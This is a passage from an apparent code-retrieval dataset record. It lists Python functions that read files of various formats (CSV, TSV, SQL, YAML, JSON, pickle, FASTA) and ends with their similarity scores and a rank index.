ValueError(\"The given path does not point to an existing file!\")\n\n file_type = file_path.split(\".\")[-1]\n\n if inner_separator is None:\n if file_type == \"csv\":\n 
inner_separator = \",\"\n elif file_type == \"tsv\":\n inner_separator = \"\\t\"\n\n if file_type == \"csv\" or file_type == \"tsv\":\n if outer_separator is None: outer_separator = \"#\"\n return self.read_csv_file(file_path, inner_separator, outer_separator)\n elif file_type == \"sql\":\n return self.read_sql_file(file_path, query_format=query_format)\n else:\n raise ValueError(\"The given file-path points neither to a .csv/.tsv nor a .sql file. Please correct this!\")", "def read_elongation(file_name):\n extension = file_name.split('.')[-1]\n\n if extension == 'prn':\n return read_prn(file_name)\n elif extension == 'csv':\n return read_csv(file_name)\n else:\n raise NotImplementedError(f'Reading {extension} files is not yet implemented.')", "def fs_read(file_path):\n try:\n with open(str(file_path), 'r') as f:\n return f.read()\n except UnicodeDecodeError:\n with open(str(file_path), 'r', encoding='latin-1') as f:\n return f.read()\n except IOError as e:\n raise e", "def _Read(filename):\n with open(filename, 'rb') as f:\n return f.read()", "def read_filepath(self, filename, file_format='FASTA'):\n file_obj = open(filename, 'r')\n ret = self.read_file_object(file_obj, file_format=file_format)\n file_obj.close()\n return ret", "def read(fname, fmt=None):\n if not fmt:\n fmt = fname.split(\".\")[-1]\n\n if fmt in ['yml', 'yaml']:\n return _storage_read(fname, yaml.safe_load)\n elif fmt == \"json\":\n return _storage_read(fname, json.load)\n elif fmt == \"pickle\":\n return _storage_read(fname, pickle.load, 'rb')\n else:\n raise Exception()", "def read(self, filepath, dirpath=None):\n self._raw_read(filepath, dirpath)\n return self._read()", "def readfile(filename, mode='r'):\n if mode != 'r' and mode != 'rb':\n print(f\"ERROR: incorrect mode : expected 'r' or 'rb' given {mode}\\n\")\n else:\n with open(Path(os.path.expanduser(filename)), mode)as f:\n content = f.read()\n f.close()\n return content", "def addReader(self, reader):\n if reader in self._readers:\n # Don't add the reader if it's already there\n return\n self._readers[reader] = True\n fd = reader.fileno()\n if fd in self._fds:\n (_, writer) = self._fds[fd]\n self._fds[fd] = (reader, writer)\n if writer:\n # We already registered this fd for write events,\n # update it for read events as well.\n self._ioloop.update_handler(fd, IOLoop.READ | IOLoop.WRITE)\n else:\n with NullContext():\n self._fds[fd] = (reader, None)\n self._ioloop.add_handler(fd, self._invoke_callback,\n IOLoop.READ)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def read_file(filename):\n if os.path.isfile(filename):\n with open(filename, 'r') as f:\n return f.read()", "def _read(filename, encodings=['ascii', 'utf-8', 'utf-16', 'latin-1']):\n text = None\n\n for encoding in encodings:\n try:\n f = open(filename, encoding=encoding)\n text = f.read()\n f.close()\n except UnicodeDecodeError:\n f.close()\n except UnicodeError:\n f.close()\n except FileNotFoundError:\n raise FileNotFoundError(\"Could not open file.\")\n\n if not text:\n raise UnicodeError(filename)\n\n return text", "def reading(self):\n if (\n self.reading_handle is None\n and self.writing_handle is None\n and self.filename is not None\n ):\n with self._open() as fp:\n self.reading_handle = 
fp\n try:\n yield\n finally:\n self.reading_handle = None\n else:\n yield", "def read_file(self, filename):\n if self._stream is None:\n raise Exception('cannot read file \"{}\" with a closed FileCabinetReader'.format(filename))\n\n info = self._files.get(filename)\n if info is None:\n raise Exception('no such file \"{}\" in FileCabinet'.format(filename))\n\n self._stream.seek(info.offset)\n return self._stream.read(info.size)", "def read(path, repo=None, rev=None, remote=None, mode=\"r\", encoding=None):\n with open(\n path, repo=repo, rev=rev, remote=remote, mode=mode, encoding=encoding\n ) as fd:\n return fd.read()", "def __init__(self,file_reader):\n self.file_reader = file_reader", "def readfp(self, fp, filename=None):\n if filename is None:\n try:\n filename = fp.name\n except AttributeError:\n filename = '<???>'\n self._read(fp, filename)", "def load_from_filepath(filepath: str, allow_unknown_file_type=False):\n try:\n return load_from_filepath_or_content(filepath, _allow_content=False)\n except NoCompatibleLoaderFoundError:\n if not allow_unknown_file_type:\n raise\n # Load the raw contents from file and assume that they are to be\n # interpreted as a raw string.\n with open(filepath) as f:\n return f.read().strip()", "def read_from_file(self, filename: str) -> None:", "def _read(self, string=\"\", fname=\"\"):\n if string:\n self.handle = gv.readstring(string)\n elif fname == \"stdin\":\n data = sys.stdin.read()\n self.handle = gv.readstring(data)\n else:\n self.handle = gv.read(fname)\n # gv returns None if eg. the input does not exist\n if not self.handle:\n raise ValueError(\"Error with file \" + fname)", "def _next(self, filename):\n try:\n return self.tmp_read[filename]['reader'].__next__()\n except StopIteration:\n return None", "def prepare_reader(self, unused_filename_queue):\n raise NotImplementedError()", "def try_read_file():\n try:\n logging.info('open config file %s', config_file_path)\n with open(config_file_path) as f:\n logging.info('begin io %s', config_file_path)\n config_file = json.load(f)\n logging.info('end io %s', config_file_path)\n return config_file\n except (OSError, IOError) as error:\n logging.info('try_read error %s', error)\n return {}", "def get_object_reader(self, container, object_name, extra_metadata=None):\n return self.oNestObjectReader(container, object_name, self.onest)", "def read(self, reader, font, tableDict):\n raise NotImplementedError(self)", "def InitConfigReader(configFile):\n configReader.readfp(open(configFile))", "def InitConfigReader(configFile):\n configReader.readfp(open(configFile))" ]
[ "0.73507124", "0.6649994", "0.6541662", "0.6465156", "0.6096228", "0.5905837", "0.5818582", "0.5808917", "0.57055247", "0.5697342", "0.5619084", "0.5508928", "0.5467147", "0.5462562", "0.5446384", "0.5420934", "0.5397053", "0.5380353", "0.53490704", "0.5324267", "0.53047097", "0.5296706", "0.52854663", "0.52788246", "0.5269713", "0.52487534", "0.524558", "0.5211467", "0.5204139", "0.5189624", "0.5180335", "0.5167302", "0.5155944", "0.51493365", "0.5142167", "0.51217777", "0.5112193", "0.5075177", "0.50630486", "0.504853", "0.5023408", "0.5016314", "0.50109744", "0.50088876", "0.5005721", "0.5003872", "0.5000394", "0.49999797", "0.49992073", "0.49894333", "0.49832302", "0.4963216", "0.4950762", "0.4942197", "0.49388057", "0.49385813", "0.49333557", "0.49161437", "0.49136788", "0.49022526", "0.4900513", "0.4897072", "0.48946717", "0.48812765", "0.48711404", "0.48709336", "0.4867331", "0.4866217", "0.4860705", "0.4825999", "0.4822746", "0.48169792", "0.48155063", "0.47805688", "0.47775322", "0.47670805", "0.4764369", "0.47564462", "0.47529122", "0.47427332", "0.47390968", "0.4734957", "0.4734", "0.4701112", "0.46970066", "0.46801522", "0.4671134", "0.4667006", "0.46651268", "0.46632677", "0.4659841", "0.46570852", "0.46545932", "0.4652076", "0.4642785", "0.46377578", "0.46354043", "0.4631074", "0.46280175", "0.46280175" ]
0.7362303
0
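Several of the reader snippets in the record above dispatch on file type: they map an extension or format name to a concrete read function and raise when nothing matches. The sketch below illustrates that pattern in isolation. It is not taken from the dataset; every name in it (read_any, _READERS, the placeholder reader functions) is invented for illustration.

```python
from pathlib import Path
from typing import Callable, Dict


def _read_csv(path: Path) -> str:
    # Placeholder: a real reader would parse rows instead of returning raw text.
    return path.read_text()


def _read_json(path: Path) -> str:
    # Placeholder: a real reader would decode JSON instead of returning raw text.
    return path.read_text()


# Registry of known file suffixes -> read functions (illustrative only).
_READERS: Dict[str, Callable[[Path], str]] = {
    ".csv": _read_csv,
    ".json": _read_json,
}


def read_any(path: str) -> str:
    """Pick a reader from the file suffix and fail loudly when none is registered."""
    suffix = Path(path).suffix.lower()
    try:
        reader = _READERS[suffix]
    except KeyError:
        raise ValueError(f"No reader registered for {suffix!r} files") from None
    return reader(Path(path))
```

Keying on the suffix keeps the registry trivial to extend, at the cost of trusting file names over file contents, which is the trade-off most of the extension-based snippets above accept.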
Identify a reader that can read a given file. A NoReaderFound error is raised if no such appropriate reader is found.
def identify(input_stream: IO[bytes]) -> str: import IPython where_am_i = "readers.__init__.identify" IPython.embed() raise exceptions.NoReaderFound( f"Found no reader that can read {input_stream.name}" ) from None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def validate_file(\n file: str,\n format: FormatType = FormatType.csv,\n delimiter: str = ',',\n header_delimiter: str = None,\n skip_blank_lines: bool = True,\n):\n\n with open_resource(file) as resource_io:\n\n if format == FormatType.csv:\n reader = CSVReader(\n resource_io,\n delimiter=delimiter,\n header_delimiter=header_delimiter,\n skip_blank_lines=skip_blank_lines,\n )\n elif format == FormatType.jsonl:\n reader = JSONLReader(resource_io)\n elif format == FormatType.json:\n reader = JSONReader(resource_io)\n else:\n raise ValueError\n\n for _ in reader:\n pass", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def _resolve_reader(self):\n self.fh = self.path.fs.open(self.path, 'rU')\n self.resolved = csv.reader(self.fh, delimiter=self.delimiter)", "def _check_rasterio_im_load(im):\n if isinstance(im, str):\n return rasterio.open(im)\n elif isinstance(im, rasterio.DatasetReader):\n return im\n else:\n raise ValueError(\n \"{} is not an accepted image format for rasterio.\".format(im))", "def retryable_reads_supported(self):\n ...", "def test_read_raw_suggested(fname):\n with pytest.raises(ValueError, match='Try reading'):\n read_raw(fname)", "def can_load(cls, filename):\n return False", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def can_handle(file_io):\r\n raise NotImplementedError(\"Please implement this in your importer\")", "def test_read_raw_unsupported_single(fname):\n with pytest.raises(ValueError, match='Unsupported file type'):\n 
read_raw(fname)", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def read_elongation(file_name):\n extension = file_name.split('.')[-1]\n\n if extension == 'prn':\n return read_prn(file_name)\n elif extension == 'csv':\n return read_csv(file_name)\n else:\n raise NotImplementedError(f'Reading {extension} files is not yet implemented.')", "def isDataSourceReadable(self):\r\n\r\n readable = True\r\n start, stop = self.getReadParameters(\\\r\n numpy.array(0, dtype=numpy.int64), self.chunk_size)\r\n try:\r\n self.data_source.read(start, stop)\r\n except tables.HDF5ExtError:\r\n readable = False\r\n print(translate('Buffer',\r\n \"\"\"\\nError: problems reading records. The dataset seems \"\"\"\r\n \"\"\"to be compressed with the {0} library. Check that it \"\"\"\r\n \"\"\"is installed in your system, please.\"\"\",\r\n 'A dataset readability error').\\\r\n format(self.data_source.filters.complib))\r\n\r\n return readable", "def CaseReader(filename):\n\n try:\n reader = SqliteCaseReader(filename)\n return reader\n except IOError:\n # filename not a valid Sqlite database file\n pass\n\n try:\n reader = HDF5CaseReader(filename)\n return reader\n except IOError:\n raise IOError('Unable to load cases from file {0}'.format(filename))", "def _check_valid_file(self, file):\n\n try:\n _ = open(f\"{file}\")\n except FileNotFoundError:\n raise ValueError", "def test_reader_instantiates(self):\n cr = CaseReader(self.filename)\n self.assertTrue(isinstance(cr, HDF5CaseReader), msg='CaseReader not'\n ' returning the correct subclass.')", "def test_call_requires_read_1_file(self):\r\n p = RtaxTaxonAssigner({\r\n 'reference_sequences_fp': self.reference_seqs_fp,\r\n 'id_to_taxonomy_fp': self.id_to_taxonomy_fp})\r\n\r\n # no read_1_seqs_fp passed results in AssertionError\r\n self.assertRaises(AssertionError, p, self.input_seqs_fp)", "def check_rasterio_im_load(im):\n if isinstance(im, (str, Path)):\n if not is_url(im) and 'VRTDataset' not in str(im):\n im = to_absolute_path(str(im))\n return rasterio.open(im)\n elif isinstance(im, rasterio.DatasetReader):\n return im\n else:\n raise ValueError(\"{} is not an accepted image format for rasterio.\".format(im))", "def is_resource(self, path):\n # type: (Text) -> bool\n raise FileNotFoundError", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def test_file_readlines_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).readlines()", "def my_reader(filename, sheetname='Sheet1', separ=','):\r\n global df_read\r\n filename_list = filename.split('.')\r\n extension = filename_list[-1]\r\n if extension == 'csv':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'data':\r\n df_read = pd.read_csv(filename, sep=separ, header=None)\r\n if extension == 'txt':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'json':\r\n df_read = pd.read_json(filename)\r\n if extension == 'html':\r\n df_read = pd.read_html(filename)\r\n if extension == 'xls':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'xlsx':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'feather':\r\n df_read = pd.read_feather(filename)\r\n if extension == 'parquet':\r\n df_read = 
pd.read_parquet(filename)\r\n if extension == 'msg':\r\n df_read = pd.read_msgpack(filename)\r\n if extension == 'dta':\r\n df_read = pd.read_stata(filename)\r\n if extension == 'sas7bdat':\r\n df_read = pd.read_sas(filename)\r\n if extension == 'pkl':\r\n df_read = pd.read_pickle(filename)\r\n return df_read", "def search_registry(filename):\n for converter in data_importers:\n if converter.check_importable(filename):\n return converter\n logging.error('No converter found', filename)\n return False", "def can_handle(file_io):\r\n\r\n try:\r\n file_io.seek(0)\r\n parsed = etree.parse(file_io)\r\n except XMLSyntaxError:\r\n # IF etree can't parse it, it's not our file.\r\n return False\r\n can_handle = False\r\n can_handle = DelXMLImporter._is_delicious_format(parsed,\r\n can_handle)\r\n\r\n # make sure we reset the file_io object so that we can use it again\r\n return can_handle", "def test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def FileCheck(fn):\n try:\n open(fn, \"r\")\n return 1\n except IOError:\n print(\"Error: File does not exist.\")\n return 0", "def read_file(self) -> misc_.file_readers.FileReaderHandler:\n\t\treturn self._read_file", "def canRead(*args, **kwargs):\n return TiffFileTileSource.canRead(*args, **kwargs)", "def test_file_reader(self) -> None:\n result = [['123', 'Jin He', 'Computer Science'],\n ['234', 'Nanda Koka', 'Software Engineering'],\n ['345', 'Benji Cai', 'Software Engineering']]\n # file have header\n self.assertTrue(\n list(file_reader('C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 3, '|', True)) == result)\n # file without header\n self.assertFalse(\n list(file_reader('C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 3, '|')) == result)\n # More than 3 datafield\n with self.assertRaises(ValueError):\n list(file_reader(\n 'C:/Users/Nidhi/Desktop/SEM3/810/HW08/student_majors.txt', 4, '|', True))\n # file not found\n with self.assertRaises(FileNotFoundError):\n list(file_reader('abc.txt', 3, '|', True))", "def read_file(\n file_path: Union[str, pathlib.Path],\n reader_name: Optional[str] = None,\n **reader_args: Any,\n) -> Reader:\n with open(file_path, mode=\"rb\") as input_stream:\n return read_stream(input_stream, reader_name)", "def canRead(*args, **kwargs):\n return GDALFileTileSource.canRead(*args, **kwargs)", "def test_read_raw_supported(fname):\n read_raw(fname)\n read_raw(fname, verbose=False)\n raw = read_raw(fname, preload=True)\n assert \"data loaded\" in str(raw)", "def _get_reader_class(basename: str) -> Type[BaseEEGReader]:\n if basename.endswith(\".h5\"):\n return RamulatorHDF5Reader\n elif basename.endswith((\".bdf\", \".mff\", \".raw\")):\n return ScalpEEGReader\n elif basename.endswith(\".npy\"):\n return NumpyEEGReader\n else:\n return SplitEEGReader", "def check_file_open(filename: str, err_string: str, required: bool = False) -> None:\n if required or filename is not None:\n if filename is None:\n print('\\n' + err_string + '\\n')\n sys.exit(1)\n else:\n try:\n pathlib.Path(filename).resolve(strict=True)\n except FileNotFoundError:\n print('\\n' + err_string + '\\n')\n sys.exit(1)", "def match(self, input_reader):\n pass", "def reader_from_file(load_dir: str, **kwargs):\n shared_resources = create_shared_resources()\n shared_resources.load(os.path.join(load_dir, \"shared_resources\"))\n if kwargs:\n shared_resources.config.update(kwargs)\n reader = readers[shared_resources.config[\"reader\"]](shared_resources)\n 
reader.load_and_setup_modules(load_dir)\n return reader", "def is_readable(self):\n raise NotImplementedError()", "def get_rdf_reader(file_path, format='nt'):\n iterator = None\n nb_triples = 0\n # load standard RDF formats using rdflib\n if format == 'nt' or format == 'ttl':\n g = Graph()\n g.parse(file_path, format=format)\n nb_triples = len(g)\n iterator = map(__n3_to_str, g.triples((None, None, None)))\n elif format == 'hdt':\n # load HDTDocument without additional indexes\n # they are not needed since we only search by \"?s ?p ?o\"\n doc = HDTDocument(file_path, indexed=False)\n iterator, nb_triples = doc.search_triples(\"\", \"\", \"\")\n return iterator, nb_triples", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def resolve(self, resource, resourceType = None):\n for loader in self.__loaders:\n if loader.supports(resource, resourceType):\n return loader;\n\n return False;", "def is_available(self, fname, downloader=None):\n self._assert_file_in_registry(fname)\n url = self.get_url(fname)\n if downloader is None:\n downloader = choose_downloader(url)\n try:\n available = downloader(url, None, self, check_only=True)\n except TypeError as error:\n error_msg = (\n f\"Downloader '{str(downloader)}' does not support availability checks.\"\n )\n raise NotImplementedError(error_msg) from error\n return available", "def read(self, file_name):\n msg = \"ReaderWriterBase::read called!\"\n raise NotImplementedError(msg)", "def isReadable(self, name):\n pass", "def can_open_stream(self):\n return True", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def 
_next(self, filename):\n try:\n return self.tmp_read[filename]['reader'].__next__()\n except StopIteration:\n return None", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await asyncio.gather(*[asyncio.wait_for(reader.read(n), timeout = timeout)], return_exceptions=True)\n\tif isinstance(temp[0], bytes):\n\t\treturn temp[0]\n\telse:\n\t\traise temp[0]", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def try_read(device_file):\n f = open(device_file, 'r')\n lines = f.readlines()\n f.close()\n return lines", "def readable(obj: Any) -> bool:\n\n return callable(getattr(obj, \"read\", None))", "def rnn_reader(file_path, word_dict, is_infer):\n\n def reader():\n with open(file_path) as f:\n for line_id, line in enumerate(f):\n yield record_reader(line, word_dict, is_infer)\n\n return reader", "def get_reader(fname):\n\n if fname == \"-\":\n fh = sys.stdin\n else:\n fh = open(fname, \"r\")\n \n rdr = csv.reader(fh, dialect=\"psv\")\n return (rdr, fh)", "def load_rule_files ( self, files_or_dirs, ignore_missing=False ):\n if ignore_missing:\n try:\n ret = self._resolver.get_reader().read ( files_or_dirs )\n except IOError as ioerr:\n if ioerr.errno == errno.ENOENT:\n ret = False\n else:\n raise\n else:\n ret = self._resolver.get_reader().read ( files_or_dirs )\n\n self.fixup_pool_id()\n return True if ret is None else ret", "def canRead(*args, **kwargs):\n return MultiFileTileSource.canRead(*args, **kwargs)", "def _looks_like_resource_file(self, name):\n # inefficient since we end up reading the file twice,\n # but it's fast enough for our purposes, and prevents\n # us from doing a full parse of files that are obviously\n # not robot files\n\n if (re.search(r'__init__.(txt|robot|html|tsv)$', name)):\n # These are initialize files, not resource files\n return False\n\n found_keyword_table = False\n if (name.lower().endswith(\".robot\") or\n name.lower().endswith(\".txt\") or\n name.lower().endswith(\".tsv\") or\n name.lower().endswith(\".resource\")):\n\n with open(name, \"r\") as f:\n data = f.read()\n for match in re.finditer(r'^\\*+\\s*(Test Cases?|(?:User )?Keywords?)',\n data, re.MULTILINE|re.IGNORECASE):\n if (re.match(r'Test Cases?', match.group(1), re.IGNORECASE)):\n # if there's a test case table, it's not a keyword file\n return False\n\n if (not found_keyword_table and\n re.match(r'(User )?Keywords?', match.group(1), re.IGNORECASE)):\n found_keyword_table = True\n return found_keyword_table", "def smart_open(filename, *args, **kwargs):\n return LOADERS.get(os.path.splitext(filename)[1], open)(filename, *args, **kwargs)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def test_detect(self):\n r = RscHtmlReader()\n fname = '10.1039_C6OB02074G.html'\n f = io.open(os.path.join(os.path.dirname(__file__), 'data', 'rsc', fname), 'rb')\n content = f.read()\n self.assertEqual(r.detect(content, fname=fname), True)", "def _IsResourceFile(self, path):\n\n raise NotImplementedError", "def test_file_read_bin_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_bin()", "def get_reader_class(cls) -> Type[SpectrumReader]:\n raise NotImplementedError(SpectrumWriter.get_reader_class.__qualname__)", "def CheckRead(read_name, 
seq, break_line, quality, fastq_fp, line_num):\n if not read_name[0] == \"@\":\n raise Exception(\"Read name does not start with @, line # {}\\n File: {}\".format(\n line_num, fastq_fp))\n for x in seq.upper():\n if x not in [\"A\",\"C\",\"T\",\"G\",\"N\"]:\n raise Exception(\"Sequence value {} not recognized. Line # {}\\n File: {}\".format(\n x, line_num + 1, fastq_fp))\n if not break_line[0] == \"+\":\n raise Exception(\"Break line not '+'. Instead '{}'. Line # {}\\n File: {}\".format(\n break_line[0],line_num + 2, fastq_fp))\n if not len(quality) == len(seq):\n raise Exception(\"Quality line wrong length. Lines # {}\\n File: {}\".format(\n line_num + 3, fastq_fp))", "def _file_read(fname):\n if not os.path.exists(fname):\n parser.error(\"File '{0}' not found.\".format(fname))\n return open(fname, 'r')", "def load_data_reader(data_reader=\"SpreadsheetDataReader\"):\n return importlib.import_module('c302.%s'%data_reader)", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def register_reader(self, fileobj, callback: typing.Callable[..., None], *args):\n if fileobj.fileno() in self.selector.get_map():\n if self.selector.get_key(fileobj).events == selectors.EVENT_WRITE:\n # If the item exists and is registered for just WRITE, listen for READ too\n self.selector.modify(fileobj, selectors.EVENT_READ | selectors.EVENT_WRITE)\n else: # If it isn't, make it just listen for read.\n self.selector.register(fileobj, selectors.EVENT_READ)\n self._readers[fileobj.fileno()] = (callback, args) # Cache our callback, overwrites if one already exists", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def getReaderByExtension(self, ext, isRGB = 0):\n\t\tassert ext in self.extMapping, \"Extension not recognized: %s\" % ext\n\t\tmpr = self.extMapping[ext]\n\t\tprefix=\"vtk\"\n\t\t# If it's a tiff file, we use our own, extended TIFF reader\n\t\tif self.extMapping[ext] == \"TIFF\":\n\t\t\tmpr = \"ExtTIFF\"\n\t\t\tprefix=\"vtkbxd\"\n\t\tself.rdrstr = \"%s.vtk%sReader()\" % (prefix, mpr)\n\t\trdr = eval(self.rdrstr)\n\t\tif ext == \"bmp\":\n\t\t\trdr.Allow8BitBMPOn()\n\t\tif ext == \"tiff\":\n\t\t\trdr.SetFileLowerLeft(self.flipVertically)\n\t\treturn rdr", "def test_read_different_location(self):\n try:\n self.reader.read(self.books[1], 0, 1)\n self.fail(\"Readed book was not in the library\")\n except AssertionError:\n pass", "def _check_file(cls, file: IO[DiskType]):\n if file.closed:\n raise ValueError(f\"File is closed\")", "def canread(self):\n return False", "def file_checker(file_name):\n if os.path.islink(file_name):\n print \"Crypto 
device Symlink %s exists\" % file_name\n return True\n else: \n try:\n with open(file_name):\n print \"File %s exists\" % file_name\n return True\n except IOError:\n print \"File %s does not exists\" % file_name\n return False", "def read_image(fname, roi=None, dset_name='default', parallelism=1):\n\n from functools import partial\n from numpy import array, ndarray\n from multiprocessing import Pool, cpu_count\n\n if isinstance(fname, str):\n fmt = fname.split('.')[-1]\n \n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n \n result = reader(fname)\n\n elif isinstance(fname, (tuple, list, ndarray)):\n fmt = fname[0].split('.')[-1]\n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n\n if parallelism == 1:\n result = array([reader(f) for f in fname])\n\n else:\n if parallelism == -1:\n num_cores = cpu_count()\n else:\n num_cores = min(parallelism, cpu_count())\n\n with Pool(num_cores) as pool:\n result = array(pool.map(reader, fname))\n else:\n raise TypeError(\n \"First argument must be string for a one file or (tuple, list, ndarray) for many files\"\n )\n\n return result", "def __is_file_eligible_to_scan(cls, path_to_test):\n return path_to_test.endswith(\".md\")", "def is_declaring_file(self, address, file_path):", "def _load_catalog_reader_class(\n self, catalog: ComponentCatalogMetadata, file_types: List[str]\n ) -> Optional[ComponentCatalogConnector]:\n try:\n catalog_reader = entrypoints.get_group_named(\"elyra.component.catalog_types\").get(catalog.schema_name)\n if not catalog_reader:\n self.log.error(\n f\"No entrypoint with name '{catalog.schema_name}' was found in group \"\n f\"'elyra.component.catalog_types' to match the 'schema_name' given in catalog \"\n f\"'{catalog.display_name}'. Skipping...\"\n )\n return None\n\n catalog_reader = catalog_reader.load()(file_types, parent=self.parent)\n except Exception as e:\n self.log.error(f\"Could not load appropriate ComponentCatalogConnector class: {e}. 
